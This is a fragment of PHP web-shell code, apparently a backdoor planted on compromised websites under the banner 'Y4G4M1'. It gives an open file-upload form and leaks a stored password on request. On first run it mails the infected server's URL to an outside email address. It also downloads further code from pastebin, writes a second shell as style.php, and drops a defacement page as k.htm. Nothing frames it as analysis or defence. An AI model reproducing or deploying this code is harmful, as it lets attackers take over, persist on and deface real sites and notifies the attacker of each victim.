-= Y4G4M1 =- Learn To Better
";
if ($_POST['_upl'] == "Upload File") {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '
Bingo !!';
} else {
echo '
Not Upload !';
}
}
if (isset($_GET["kupload"])) {
echo "$up";
}
/////////////////////////////
if (isset($_GET["pass"])) {
echo "Password E :" . $auth_pass;
}
/////////////////////////////
if (file_exists('.db')) {
} else {
$to = "elmodemviejo@gmail.com";
$subject = $_SERVER['SERVER_NAME'];
$header = "From: kira ";
$message = "Exploit : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
mail($to, $subject, $message, $header);
$m = fopen(".db", "w") or die(" ");
$txt = "";
fwrite($m, $txt);
fclose($m);
chmod(".db", 0644);
}
/////////////////////////////
if (isset($_GET["kshell"])) {
$anak1 = file_get_contents("https://pastebin.com/raw/PAXWBLVD");
$nggawe1 = fopen("style.php", "w") or die("bad news");
fwrite($nggawe1, $anak1);
fclose($nggawe1);
header("Location:style.php");
chmod("style.php", 0644);
}
//////////////////////////////
if (isset($_GET["kdeface"])) {
$anak = file_get_contents("https://pastebin.com/raw/2gVVRU1c");
$nggawe = fopen("k.htm", "w") or die("bad news");
fwrite($nggawe, $anak);
fclose($nggawe);
header("Location:k.htm");
}
?>